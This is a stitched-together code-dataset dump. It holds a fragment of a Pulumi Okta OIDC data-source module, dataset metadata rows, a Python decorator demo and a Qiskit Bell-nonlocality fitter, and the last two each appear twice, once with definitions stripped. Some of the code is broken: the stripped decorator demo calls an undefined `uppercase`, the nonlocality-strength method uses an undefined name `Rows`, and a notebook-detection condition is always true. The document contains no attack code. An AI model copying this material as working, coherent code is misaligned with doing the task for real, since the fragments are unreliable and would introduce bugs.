        # NOTE(review): because each check is guarded by `if <value> and ...`,
        # falsy values of the wrong type (e.g. 0, "") skip validation.
        if authorization_binding and not isinstance(authorization_binding, str):
            raise TypeError("Expected argument 'authorization_binding' to be a str")
        pulumi.set(__self__, "authorization_binding", authorization_binding)
        if authorization_url and not isinstance(authorization_url, str):
            raise TypeError("Expected argument 'authorization_url' to be a str")
        pulumi.set(__self__, "authorization_url", authorization_url)
        if client_id and not isinstance(client_id, str):
            raise TypeError("Expected argument 'client_id' to be a str")
        pulumi.set(__self__, "client_id", client_id)
        if client_secret and not isinstance(client_secret, str):
            raise TypeError("Expected argument 'client_secret' to be a str")
        pulumi.set(__self__, "client_secret", client_secret)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if issuer_mode and not isinstance(issuer_mode, str):
            raise TypeError("Expected argument 'issuer_mode' to be a str")
        pulumi.set(__self__, "issuer_mode", issuer_mode)
        if issuer_url and not isinstance(issuer_url, str):
            raise TypeError("Expected argument 'issuer_url' to be a str")
        pulumi.set(__self__, "issuer_url", issuer_url)
        if jwks_binding and not isinstance(jwks_binding, str):
            raise TypeError("Expected argument 'jwks_binding' to be a str")
        pulumi.set(__self__, "jwks_binding", jwks_binding)
        if jwks_url and not isinstance(jwks_url, str):
            raise TypeError("Expected argument 'jwks_url' to be a str")
        pulumi.set(__self__, "jwks_url", jwks_url)
        if max_clock_skew and not isinstance(max_clock_skew, int):
            raise TypeError("Expected argument 'max_clock_skew' to be a int")
        pulumi.set(__self__, "max_clock_skew", max_clock_skew)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if protocol_type and not isinstance(protocol_type, str):
            raise TypeError("Expected argument 'protocol_type' to be a str")
        pulumi.set(__self__, "protocol_type", protocol_type)
        if scopes and not isinstance(scopes, list):
            raise TypeError("Expected argument 'scopes' to be a list")
        pulumi.set(__self__, "scopes", scopes)
        if token_binding and not isinstance(token_binding, str):
            raise TypeError("Expected argument 'token_binding' to be a str")
        pulumi.set(__self__, "token_binding", token_binding)
        if token_url and not isinstance(token_url, str):
            raise TypeError("Expected argument 'token_url' to be a str")
        pulumi.set(__self__, "token_url", token_url)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)
        if user_info_binding and not isinstance(user_info_binding, str):
            raise TypeError("Expected argument 'user_info_binding' to be a str")
        pulumi.set(__self__, "user_info_binding", user_info_binding)
        if user_info_url and not isinstance(user_info_url, str):
            raise TypeError("Expected argument 'user_info_url' to be a str")
        pulumi.set(__self__, "user_info_url", user_info_url)
@property
@pulumi.getter(name="authorizationBinding")
def authorization_binding(self) -> str:
"""
The method of making an authorization request.
"""
return pulumi.get(self, "authorization_binding")
@property
@pulumi.getter(name="authorizationUrl")
def authorization_url(self) -> str:
"""
IdP Authorization Server (AS) endpoint to request consent from the user and obtain an authorization code grant.
"""
return pulumi.get(self, "authorization_url")
@property
@pulumi.getter(name="clientId")
def client_id(self) -> str:
"""
Unique identifier issued by AS for the Okta IdP instance.
"""
return pulumi.get(self, "client_id")
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> str:
"""
Client secret issued by AS for the Okta IdP instance.
"""
return pulumi.get(self, "client_secret")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
id of idp.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="issuerMode")
def issuer_mode(self) -> str:
"""
Indicates whether Okta uses the original Okta org domain URL, or a custom domain URL.
"""
return pulumi.get(self, "issuer_mode")
@property
@pulumi.getter(name="issuerUrl")
def issuer_url(self) -> str:
"""
URI that identifies the issuer.
"""
return pulumi.get(self, "issuer_url")
@property
@pulumi.getter(name="jwksBinding")
def jwks_binding(self) -> str:
"""
The method of making a request for the OIDC JWKS.
"""
return pulumi.get(self, "jwks_binding")
@property
@pulumi.getter(name="jwksUrl")
def jwks_url(self) -> str:
"""
Endpoint where the keys signer publishes its keys in a JWK Set.
"""
return pulumi.get(self, "jwks_url")
@property
@pulumi.getter(name="maxClockSkew")
def max_clock_skew(self) -> int:
"""
Maximum allowable clock-skew when processing messages from the IdP.
"""
return pulumi.get(self, "max_clock_skew")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
name of the idp.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="protocolType")
def protocol_type(self) -> str:
"""
The type of protocol to use.
"""
return pulumi.get(self, "protocol_type")
@property
@pulumi.getter
def scopes(self) -> Sequence[str]:
"""
The scopes of the IdP.
"""
return pulumi.get(self, "scopes")
@property
@pulumi.getter(name="tokenBinding")
def token_binding(self) -> str:
"""
The method of making a token request.
"""
return pulumi.get(self, "token_binding")
@property
@pulumi.getter(name="tokenUrl")
def token_url(self) -> str:
"""
IdP Authorization Server (AS) endpoint to exchange the authorization code grant for an access token.
"""
return pulumi.get(self, "token_url")
@property
@pulumi.getter
def type(self) -> str:
"""
type of idp.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userInfoBinding")
def user_info_binding(self) -> str:
"""
The method of making a user info request.
"""
return pulumi.get(self, "user_info_binding")
@property
@pulumi.getter(name="userInfoUrl")
def user_info_url(self) -> str:
"""
Protected resource endpoint that returns claims about the authenticated user.
"""
return pulumi.get(self, "user_info_url")
class AwaitableGetOidcResult(GetOidcResult):
    """Awaitable variant of :class:`GetOidcResult`.

    Awaiting an instance never suspends; it simply returns a plain
    :class:`GetOidcResult` carrying the same field values, so the result of
    ``get_oidc`` can be used from both synchronous and asynchronous code.
    """
    # pylint: disable=using-constant-test
    def __await__(self):
        # The dead ``yield`` turns this method into a generator, which is what
        # the awaitable protocol requires; the branch is never taken.
        if False:
            yield self
        return GetOidcResult(
            authorization_binding=self.authorization_binding,
            authorization_url=self.authorization_url,
            client_id=self.client_id,
            client_secret=self.client_secret,
            id=self.id,
            issuer_mode=self.issuer_mode,
            issuer_url=self.issuer_url,
            jwks_binding=self.jwks_binding,
            jwks_url=self.jwks_url,
            max_clock_skew=self.max_clock_skew,
            name=self.name,
            protocol_type=self.protocol_type,
            scopes=self.scopes,
            token_binding=self.token_binding,
            token_url=self.token_url,
            type=self.type,
            user_info_binding=self.user_info_binding,
            user_info_url=self.user_info_url)
def get_oidc(id: Optional[str] = None,
             name: Optional[str] = None,
             opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetOidcResult:
    """
    Use this data source to retrieve a OIDC IdP from Okta.
    ## Example Usage
    ```python
    import pulumi
    import pulumi_okta as okta
    example = okta.idp.get_oidc(name="Example Provider")
    ```
    :param str id: The id of the idp to retrieve, conflicts with `name`.
    :param str name: The name of the idp to retrieve, conflicts with `id`.
    """
    invoke_args = {'id': id, 'name': name}
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    raw = pulumi.runtime.invoke('okta:idp/getOidc:getOidc', invoke_args,
                                opts=opts, typ=GetOidcResult).value
    # Copy every field of the raw invoke result into the awaitable wrapper.
    field_names = ('authorization_binding', 'authorization_url', 'client_id',
                   'client_secret', 'id', 'issuer_mode', 'issuer_url',
                   'jwks_binding', 'jwks_url', 'max_clock_skew', 'name',
                   'protocol_type', 'scopes', 'token_binding', 'token_url',
                   'type', 'user_info_binding', 'user_info_url')
    return AwaitableGetOidcResult(**{f: getattr(raw, f) for f in field_names})
| 4,612 | 23 | 75 |
78649f653658eb525ecfda8006945a0bc03fb895 | 430 | py | Python | python_practice/python_tricks/chp3/decorator/example_5-1.py | sokunmin/deep_learning_practices | 49e1a08adbfcd2054adb1c08236d57405fad14d3 | [
"Apache-2.0"
] | null | null | null | python_practice/python_tricks/chp3/decorator/example_5-1.py | sokunmin/deep_learning_practices | 49e1a08adbfcd2054adb1c08236d57405fad14d3 | [
"Apache-2.0"
] | null | null | null | python_practice/python_tricks/chp3/decorator/example_5-1.py | sokunmin/deep_learning_practices | 49e1a08adbfcd2054adb1c08236d57405fad14d3 | [
"Apache-2.0"
] | null | null | null |
# ----------------- Debuggable Decorators ----------------- #
# [1] metadata attached to original function is hidden
def greet():
    """return a friendly greeting. """
    # Docstring kept byte-identical: the demo below prints greet.__doc__.
    message = 'Hi, there!'
    return message
print(greet.__name__)
print(greet.__doc__)
decorated_greet = uppercase(greet)
print(decorated_greet.__name__)
print(decorated_greet.__doc__)
| 19.545455 | 61 | 0.651163 |
# ----------------- Debuggable Decorators ----------------- #
def uppercase(func):
    # Naive decorator: upper-cases func's return value. It deliberately does
    # NOT use functools.wraps — hiding the wrapped function's __name__ and
    # __doc__ is exactly what this example demonstrates below.
    def wrapper():
        result = func()
        return result.upper()
    return wrapper
# [1] metadata attached to original function is hidden
def greet():
    """return a friendly greeting. """
    # Docstring kept byte-identical: the demo below prints greet.__doc__.
    message = 'Hi, there!'
    return message
print(greet.__name__)
print(greet.__doc__)
decorated_greet = uppercase(greet)
print(decorated_greet.__name__)
print(decorated_greet.__doc__)
| 67 | 0 | 22 |
34146f89f88df887ca2126f16ca343ed46b8ebce | 37,694 | py | Python | qiskit/ignis/verification/nonlocality/bell_nonlocality.py | anndero/qiskit-ignis | 7e4619dfdcb00e5c601e035083c6ea709b23b075 | [
"Apache-2.0"
] | null | null | null | qiskit/ignis/verification/nonlocality/bell_nonlocality.py | anndero/qiskit-ignis | 7e4619dfdcb00e5c601e035083c6ea709b23b075 | [
"Apache-2.0"
] | null | null | null | qiskit/ignis/verification/nonlocality/bell_nonlocality.py | anndero/qiskit-ignis | 7e4619dfdcb00e5c601e035083c6ea709b23b075 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Bell nonlocality testing class."""
import qiskit
import cplex
import itertools
import functools
import collections
import numpy as np
from math import ceil
try:
from matplotlib import pyplot as plt
PLT = True
except ImportError:
PLT = False
try:
shell = get_ipython().__class__.__name__
if shell == 'ZMQInteractiveShell' or "google.colab._shell":
from tqdm import tqdm_notebook as tqdm
else:
from tqdm import tqdm as tqdm
except NameError:
from tqdm import tqdm as tqdm
from qiskit.ignis.verification.nonlocality.bell_scenario import BellScenario
from typing import Optional, Sequence, Union, List, Dict
NumType = Union[int, float, complex]
StateType = Union[qiskit.quantum_info.states.DensityMatrix,
qiskit.quantum_info.states.Statevector,
np.ndarray, List[List[NumType]]]
GateType = Union[qiskit.circuit.Gate, qiskit.quantum_info.Operator,
List[List[NumType]], np.ndarray]
| 44.714116 | 119 | 0.532048 | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Bell nonlocality testing class."""
import qiskit
import cplex
import itertools
import functools
import collections
import numpy as np
from math import ceil
try:
from matplotlib import pyplot as plt
PLT = True
except ImportError:
PLT = False
try:
shell = get_ipython().__class__.__name__
if shell == 'ZMQInteractiveShell' or "google.colab._shell":
from tqdm import tqdm_notebook as tqdm
else:
from tqdm import tqdm as tqdm
except NameError:
from tqdm import tqdm as tqdm
from qiskit.ignis.verification.nonlocality.bell_scenario import BellScenario
from typing import Optional, Sequence, Union, List, Dict
NumType = Union[int, float, complex]
StateType = Union[qiskit.quantum_info.states.DensityMatrix,
qiskit.quantum_info.states.Statevector,
np.ndarray, List[List[NumType]]]
GateType = Union[qiskit.circuit.Gate, qiskit.quantum_info.Operator,
List[List[NumType]], np.ndarray]
class BLocFitter(BellScenario):
#-----------------------------------------------------------------------------------------------
    def __init__(self,
                 sett: Sequence[int],
                 results: Optional[List[qiskit.result.Result]] = None,
                 state: Optional[StateType] = None,
                 pre_meas_gates: Optional[List[List[GateType]]] = None):
        """ Initialize BLocFitter with attributes.
        Assumes that results come from qiskit circuits built of state preparation part and
        measurements preceded by pre_meas_gates.
        Providing state and pre_meas_gates is necessary to calculate theoretical tests.
        Structure of pre_meas_gates should reflect the settings scenario with sublists of available
        1-qubit gates or matrices for a respective subsystem. For example:
        >>> pre_meas_gates = [[XGate,YGate,ZGate],[RXGate(pi/3),RYGate(pi/6)]]
        indicates 2 subsystems with 3 and 2 options respectively.
        Args:
            sett (Sequence[int]): possible measurement settings per subsystem. len(sett) is the
                number of subsystems.
            results (List[Result]): qiskit circuit results in order due to the increasing input
                indices.
            state (Statevector or DensityMatrix or matrix or vector): a quantum state.
            pre_meas_gates (List[List[Gate or Operator or unitary matrix]]): lists of grouped
                unitary gates preceding the measurements.
        """
        # d=2: qubit scenario; may be overwritten by the `rho` setter.
        super().__init__(sett=sett, d=2)
        self._meas_qcorr = []   # measured probabilities, one per LP row
        self._calc_qcorr = {}   # cache: LP row -> Born-rule probability
        self._results = []      # list of added qiskit result batches
        if results is not None:
            self.add_results(results)
        self._rho = None        # density matrix (set through the `rho` property)
        if state is not None:
            self.rho = state
        self._gates = None      # validated pre-measurement unitaries
        if pre_meas_gates is not None:
            self.pre_meas_gates = pre_meas_gates
        self._LP = None         # cplex model, built lazily by new_LP()
# qiskit results --> measured quantum correlations
#-----------------------------------------------------------------------------------------------
@property
def results(self) -> List[List[qiskit.result.Result]]:
""" Return a list of all added qiskit experiment results.
Returns:
List[List[Result]]: qiskit experiment results."""
return self._results
    def add_results(self, results: List[List[qiskit.result.Result]], clear: bool = False):
        """ Add list of qiskit results to self.results. Calculate measured quantum correlations
        and update self.meas_qcorr.
        Args:
            results (List[Result]): qiskit circuits results in order due to the increasing input
                indices.
            clear (bool): if True then clear all previously added results, otherwise all results
                are taken into account [Default: False].
        Raises:
            TypeError: if elements of results list are not qiskit Results.
            QiskitError: if results are incompatible with setting scenario or if all results
                doesn't have the same number of shots.
        """
        if not all(isinstance(r, qiskit.result.Result) for r in results):
            raise TypeError("Results should be a list of qiskit Result objects.")
        # One result per joint measurement setting is expected.
        if len(results) != np.prod(self.s):
            raise qiskit.QiskitError(
                "Results should be a list of length {}".format(np.prod(self.s)))
        # Equal shot counts are required so batches can be averaged later.
        if len(set([r.results[0].shots for r in results])) != 1:
            raise qiskit.QiskitError(
                "Number of shots in all results in the list should be the same.")
        if clear:
            self._results = []
        self._results.append(results)
        self.calc_meas_qcorr()
def calc_meas_qcorr(self) -> None:
""" Calculate measured quantum correlations and set self.meas_qcorr."""
total_counts = np.zeros(self.rows_a)
shots = 0
for results in self._results:
shots += results[0].results[0].shots
counts = []
for res in results:
counts.extend([v for k, v in sorted(res.get_counts().items())])
total_counts += np.array(counts)
self._meas_qcorr = total_counts/shots
# density matrix of quantum state
#-----------------------------------------------------------------------------------------------
@property
def rho(self) -> np.ndarray:
""" Return the density matrix of a quantum state.
The setter validates if an arg is a valid quantum state."""
return self._rho
@rho.setter
def rho(self, state: StateType):
if not isinstance(state, qiskit.quantum_info.states.DensityMatrix):
state = qiskit.quantum_info.states.DensityMatrix(state)
if (state.is_valid() and len(state.dims()) == self.n and len(set(state.dims())) == 1):
self._rho = state.data
self._d = state.dims()[0]
else:
raise qiskit.QiskitError("Invalid state.")
# unitary matrices of pre measurement gates
#-----------------------------------------------------------------------------------------------
@property
def pre_meas_gates(self) -> List[List[np.ndarray]]:
""" Return the lists of the established unitary gates preceding the measurements.
Returns:
List[List[np.ndarray]]: unitary matrices."""
return self._gates
@pre_meas_gates.setter
def pre_meas_gates(self, gates: List[List[GateType]]):
if (len(gates) != self.n or any(len(gates[i]) != self.s[i] for i in range(self.n))):
raise qiskit.QiskitError(
"pre_meas_gates are incompatible with the settings scenario.")
self._gates = [[self.__check_single_gate(i) for i in j] for j in gates]
self._calc_qcorr.clear()
def __check_single_gate(self, gate: GateType) -> np.ndarray:
if hasattr(gate, 'to_matrix'):
gate = gate.to_matrix()
elif hasattr(gate, 'to_operator'):
gate = gate.to_operator().data
gate = np.array(gate, dtype=complex)
if not qiskit.quantum_info.operators.predicates.is_unitary_matrix(gate):
raise qiskit.QiskitError("Matrix is not unitary.")
if gate.shape[0]!= self.d:
raise qiskit.QiskitError("Matrix is incompatible with self.d.")
return gate
# quantum correlations
#-----------------------------------------------------------------------------------------------
def get_quantum_corr(self, source: str, row: int) -> np.float:
""" Return quantum correlation for inputs and outputs of a given row.
Args:
source (str): source of quantum correlations:
'meas': probabilities from qiskit experiment results.
'calc': probabilities calculated according to Born rule.
row (int): an index of a constraint in an optimization problem.
Returns:
np.float: quantum probability.
"""
if source.lower() == 'meas':
if self.meas_qcorr is not None:
return self._meas_qcorr[self._check_int(row)]
else:
raise qiskit.QiskitError(
"To return measured quantum correlations please add qiskit results.")
elif source.lower() == 'calc':
return self._calc_qcorr.setdefault(row,self.quantum_prob(row))
else:
raise qiskit.QiskitError(
"Invalid source of quantum correlations. Should be 'meas' or 'calc'.")
@property
def meas_qcorr(self) -> List[float]:
""" Return a list of the measured quantum correlations with indices corresponding to the
LP rows.
The setter validates if the sum of correlations is correct."""
return self._meas_qcorr
@meas_qcorr.setter
def meas_qcorr(self, corr: List[float]):
if not np.isclose(sum(corr),np.prod(self.s)):
raise qiskit.QiskitError('Invalid sum of correlations.')
self._meas_qcorr = corr
@property
def calc_qcorr(self) -> Dict[int, float]:
""" Return a dict mapping row indices to the calculated quantum correlations.
The setter validates the type of argument."""
return self._calc_qcorr
@calc_qcorr.setter
def calc_qcorr(self, corr: Dict[int, np.float]):
if not isinstance(corr,dict):
raise qiskit.QiskitError(
"corr should be a dict mapping rows to the corresponding quantum probabilities.")
self._calc_qcorr = corr
def quantum_prob(self, row: int) -> np.float:
""" Return quantum probability according to Born rule."""
if self.pre_meas_gates is None or self.rho is None:
raise qiskit.QiskitError(
"To calculate quantum probability, please provide rho and pre_meas_gates.")
m = self.inputs(row)
rid = int(float(row))%(self.d**self.n)
U = functools.reduce(np.kron, [np.linalg.inv( self.pre_meas_gates[i][j] )
for i, j in enumerate(m)])
p = 0*1j
for l in range(self.d**self.n):
for k in range(self.d**self.n):
p += U[k][rid].conjugate() * self.rho[k][l] * U[l][rid]
return np.real(p)
# linear programming
#-----------------------------------------------------------------------------------------------
@property
def LP(self) -> cplex.Cplex:
""" Return the cplex LP model."""
return self._LP
    def new_LP(self, LP_type: str) -> None:
        """ Build new cplex LP model and set it to self.LP.
        Args:
            LP_type (str): type of an optimization problem, can be either 'feasibility'
                or 'optimization'.
        """
        self._LP = cplex.Cplex()
        # set objective: one probability variable in [0, 1] per deterministic
        # LHV strategy (self.cols of them); the 'optimization' variant appends
        # one extra variable (the visibility) which is the only one maximized.
        if LP_type.lower() == 'feasibility':
            self.LP.variables.add(ub = np.ones(self.cols),
                                  lb = np.zeros(self.cols))
        elif LP_type.lower() in ['optimization','optimisation']:
            self.LP.variables.add(obj = np.hstack((np.zeros(self.cols),[1.0])),
                                  ub = np.ones(self.cols+1),
                                  lb = np.zeros(self.cols+1))
        else:
            raise qiskit.QiskitError(
                "Invalid LP_type. Should be either 'feasibility' or "
                "'optimization'. Objective hasn't been set.")
        self.LP.objective.set_sense(self.LP.objective.sense.maximize)
        # summation constraint: LHV strategy weights form a probability
        # distribution, i.e. they sum to 1.
        self.LP.linear_constraints.add(
            lin_expr = [cplex.SparsePair(ind = range(self.cols),
                                         val = np.ones(self.cols))],
            rhs = [1.0], senses = 'E', range_values = [0.0], names = ['sum'])
        # restrict output: silence all cplex logging streams.
        self.LP.set_log_stream(None)
        self.LP.set_error_stream(None)
        self.LP.set_warning_stream(None)
        self.LP.set_results_stream(None)
        # solving method: dual simplex, 3 threads, deterministic parallel mode.
        alg = self.LP.parameters.lpmethod.values
        self.LP.parameters.lpmethod.set(alg.dual)
        self.LP.parameters.threads.set(3)
        self.LP.parameters.parallel.set(1)
    def populate_LP(self, LP_type: str, source: str, rows: Sequence[int]) -> None:
        """ Adds constraints to cplex LP model.
        Args:
            LP_type (str): type of an optimization problem, can be either 'feasibility'
                or 'optimization'.
            source (str): source of quantum correlations, can be either 'meas' or 'calc'.
            rows (Sequence[int]): indices of constraints in the LP problem.
        """
        if isinstance(rows, str):
            raise TypeError(
                "String sequence can be ambiguous in multisetting scenario.")
        if not hasattr(rows, '__iter__'):
            rows = [self._check_int(rows)]
        if LP_type.lower() == 'feasibility':
            # One equality per row: the LHV strategies contributing to this
            # row must reproduce the quantum probability exactly.
            self.LP.linear_constraints.add(
                lin_expr=[cplex.SparsePair(
                    ind=self.get_local_corr(row),
                    val=np.ones(len(self.local_corr.get(row)))) for row in rows],
                rhs=[self.get_quantum_corr(source, row) for row in rows],
                senses=np.full(len(rows),'E'), range_values=np.zeros(len(rows)))
        elif LP_type.lower() in ['optimization', 'optimisation']:
            # Noisy-state variant: the extra visibility variable (index
            # self.cols) enters each row with coefficient d**-n - p_quantum,
            # so the model matches v*p_q + (1-v)*d**-n (white-noise mixing).
            self.LP.linear_constraints.add(
                lin_expr=[cplex.SparsePair(
                    ind=self.get_local_corr(row) + [self.cols],
                    val=[1.0]*len(self.local_corr[row]) + [self.d**(-self.n)
                        - self.get_quantum_corr(source, row)]) for row in rows],
                rhs=np.full(len(rows), self.d**(-self.n)),
                senses=np.full(len(rows),'E'), range_values=np.zeros(len(rows)))
        else:
            raise qiskit.QiskitError(
                "Invalid LP_type. Should be either 'feasibility' or 'optimization'. "
                "Constraints hasn't been set.")
# handler
#-----------------------------------------------------------------------------------------------
def __handle_args(self, source, rows, nosignaling, min_size, max_size, step):
if not isinstance(source,str) or source.lower() not in ['meas','calc']:
raise ValueError("Source should be either 'meas' or 'calc'.")
if not isinstance(nosignaling,(bool,np.bool_)):
raise TypeError("nosignaling should be True or False.")
if rows is None:
rows = list(range(self.rows_a))
elif isinstance(rows, str):
raise TypeError(
"String sequence can be ambiguous in multisetting scenario.")
elif not hasattr(rows, '__iter__'):
rows = [self._check_int(rows)]
else:
rows = list(set(rows)) # remove duplicates
if max_size is None: # solve the full LP at the end
max_size = min(self.rows_b, len(rows)) if nosignaling else len(rows)
else:
max_size = self._check_int(max_size)
subset = []
if min_size is None: # solve the LP without iteration
min_size = max_size
elif hasattr(min_size,'__iter__'): # start from custom initial subset
if isinstance(min_size, str):
raise TypeError(
"String sequence can be ambiguous in multisetting scenario.")
subset = list(set(min_size.copy())) # remove duplicates
min_size = len(subset)
else:
min_size = self._check_int(min_size)
if not (1 <= min_size <= max_size <= len(rows)):
raise ValueError("Invalid iterative bounds on subset size.")
if step is None:
step = ceil(len(rows)/100)
else:
self._check_int(step)
if not (1 <= step <= max_size):
raise ValueError("Iterative step is out of range.")
return (rows, min_size, max_size, step, subset)
#-----------------------------------------------------------------------------------------------
    def nonlocality_test(self,
                         source: str = 'meas',
                         rows: Optional[Sequence[int]] = None,
                         nosignaling: bool = False,
                         min_size: Optional[Union[int, Sequence[int]]] = None,
                         max_size: Optional[int] = None,
                         step: Optional[int] = None,
                         progressbar: bool = False):
        """ Test Bell nonlocality.
        According to Bell theorem the correlations of some entangled states can't be described
        by local realistic models. This method checks the feasibility of a classical (LHV) model
        by solving a linear program; if the LP is infeasible, Bell nonlocality was detected.
        Args:
            source (str): source of quantum correlations. [Default: 'meas']
                'meas': probabilities from qiskit backend results.
                'calc': probabilities calculated according to Born rule.
            rows (Sequence[int]): indices of constraints taken into account in solving LP.
                If None then takes all constraints. [Default: None]
            nosignaling: (bool): if True then only nonredundand rows according to default
                nosignaling rule are passed to LP. [Default: False]
            min_size (int or list[int]): initial number of constraints in iterative solving.
                If None then solves only LP with max_size of constraints without iteration.
                If given as sequence then starts iteration from custom initial subset of constraints.
                [Default: None]
            max_size (int): maximal number of constraints in iterative solving.
                If None then in final step solves the full LP with all rows. [Default: None]
            step (int): the increase in size of subset of constraints in iterative solving.
                If None then ceil(1% of all constraints). [Default: None]
            progressbar (bool): show tqdm progressbar if True. [Default: False]
        Returns:
            bool: True if Bell nonlocality was detected, which is possible only for some entangled
                quantum states. False if quantum correlations can be reproduced classically within
                Local Hidden Variables (LHV) model.
        """
        (rows, min_size, max_size, step, subset) = self.__handle_args(
            source=source, rows=rows, nosignaling=nosignaling,
            min_size=min_size, max_size=max_size, step=step)
        self.new_LP('feasibility')
        subset_size = len(subset)
        if subset_size > 0:
            # Seed the LP with the user-provided initial subset.
            for row in subset:
                rows.remove(row)
            self.populate_LP('feasibility', source, subset)
        if progressbar:
            pbar = tqdm(initial=0, total=max_size)
        # Grow the constraint set until infeasible (nonlocal) or exhausted.
        for size in itertools.chain(range(min_size, max_size, step), [max_size]):
            new_rows = []
            if not nosignaling:
                for new in range(size - subset_size):
                    new_rows.append(rows.pop(np.random.randint(len(rows))))
            else:
                while len(new_rows) < size - subset_size and rows:
                    new = rows.pop(np.random.randint(len(rows)))
                    if self.get_nonredundant(new): new_rows.append(new)
            if new_rows:
                subset_size += len(new_rows)
                self.populate_LP('feasibility', source, new_rows)
            self.LP.solve()
            status = self.LP.solution.get_status_string()
            # infeasible -> nonlocal; optimal -> classical model exists;
            # anything else is passed through as the solver status string.
            NL = True if status=='infeasible' else (
                False if status=='optimal' else status)
            if progressbar:
                pbar.update(subset_size - pbar.n)
                pbar.set_description_str(desc=str(NL), refresh=True)
            if NL or not rows:
                break
        return NL
#-----------------------------------------------------------------------------------------------
def nonlocality_strength(self,
source: str = 'meas',
rows: Optional[Sequence[int]] = None,
nosignaling: bool = False,
min_size: Optional[Union[int, Sequence[int]]] = None,
max_size: Optional[int] = None,
step: Optional[int] = None,
progressbar: bool = False,
plot: bool = False):
""" Calculate Bell nonlocality strength:
The nonlocality strength is understood as resistance to noise and defined as the amount of
white noise admixture required to completely suppress the nonclassical character of the
original quantum correlations. The calculation of strength is based on visibility parameter
:math:`v` in: :math:`\rho(v)= v\rho +(1-v)\rho_{white noise}`. This method involves solving
an optimization problem (LP) in which the visibility is maximized until the set of linear
constraints can no longer be satisfied. That returns a critical visibility parameter, while
:math: `nonlocality strength = 1 - critical visibility`.
Args:
source (str): source of quantum correlations. [Default: 'meas']
'meas': probabilities from qiskit backend results.
'calc': probabilities calculated according to Born rule.
rows (list[int]): indices of constraints taken into account in
solving LP. If None then takes all constraints. [Default: None]
nosignaling: (bool): if True then only nonredundand rows according
to default nosignaling rule are passed to LP. [Default: False]
min_size (int or list[int]): initial number of constraints in
iterative solving. If None then solves only LP with max_size
of constraints without iteration. If given as sequence then
starts iteration from custom initial subset of constraints.
[Default: None]
max_size (int): maximal number of constraints in iterative solving.
If None then in final step solves the full LP with all rows.
[Default: None]
step (int): the increase in size of subset of constraints
in iterative solving. If None then ceil(1% of all constraints).
[Default: None]
progressbar (bool): show tqdm progressbar if True. [Default: False]
plot (bool): if True then plot nonlocality strength convergence vs
the size of constraints set. [Default: False]
Returns:
np.float: the nonlocality strength.
"""
(rows, min_size, max_size, step, subset) = self.__handle_args(
source=source, rows=rows, nosignaling=nosignaling,
min_size=min_size, max_size=max_size, step=step)
self.new_LP('optimization')
subset_size = len(subset)
if subset_size > 0:
for row in subset:
Rows.remove(row)
self.populate_LP('optimization', source, subset)
strength_dict={}
prec_dict = {}
if progressbar:
pbar = tqdm(initial = 0, total = max_size)
for size in itertools.chain(range(min_size, max_size, step), [max_size]):
new_rows = []
if not nosignaling:
for new in range(size - subset_size):
new_rows.append(Rows.pop(np.random.randint(len(rows))))
else:
while len(new_rows) < size - subset_size and rows:
new = rows.pop(np.random.randint(len(rows)))
if self.get_nonredundant(new):
new_rows.append(new)
if new_rows:
subset_size += len(new_rows)
self.populate_LP('optimization', source, new_rows)
self.LP.solve()
cv = self.LP.solution.get_objective_value()
prec = self.LP.solution.get_float_quality(
self.LP.solution.quality_metric.max_primal_infeasibility)
strength_dict[size] = 1 - cv
prec_dict[size] = prec
if progressbar:
pbar.update(size - pbar.n)
pbar.set_description_str(desc=str([1-cv, prec]), refresh=True)
if not rows:
break
if plot:
fig, ax = plt.subplots(1,figsize=(12,8))
for item in ([ax.title,ax.xaxis.label,ax.yaxis.label] +
ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(14)
size = sorted(strength_dict.keys())
STRENGTH = np.array([strength_dict[key] for key in size])
PREC = np.array([prec_dict[key] for key in size])
ax.plot(size, STRENGTH, lw=1, color='blue', marker='.')
ax.fill_between(size, STRENGTH+PREC, STRENGTH-PREC, facecolor='blue', alpha=0.3)
ax.set_xlabel('subset size')
ax.set_ylabel('critical visibility')
ax.grid()
ticks = plt.yticks()
if (ticks[0][1]-STRENGTH[-1]) < (ticks[0][-1]-STRENGTH[-1])/40:
i = 1
else:
i = 0
ticks[0][i] = STRENGTH[-1]
plt.yticks(ticks[0][i:-1])
fig.tight_layout()
return [1 - cv, prec]
#-----------------------------------------------------------------------------------------------
    def nonlocality_sub_test(self,
                             source: str = 'meas',
                             rows: Optional[Sequence[int]] = None,
                             nosignaling: bool = False,
                             min_size: Optional[int] = None,
                             max_size: Optional[int] = None,
                             step: Optional[int] = None,
                             runs: int = 1,
                             progressbar: bool = False,
                             plot: bool = False):
        """ Subsampling row constraints in testing Bell nonlocality :
        Args:
            source (str): source of quantum correlations. [Default: 'meas']
                'meas': probabilities from qiskit backend results.
                'calc': probabilities calculated according to Born rule.
            rows (list[int]): indices of constraints taken into account in solving LP.
                If None then takes all constraints. [Default: None]
            nosignaling: (bool): if True then only nonredundand rows according to default
                nosignaling rule are passed to LP. [Default: False]
            min_size (int or list[int]): initial number of constraints in iterative solving.
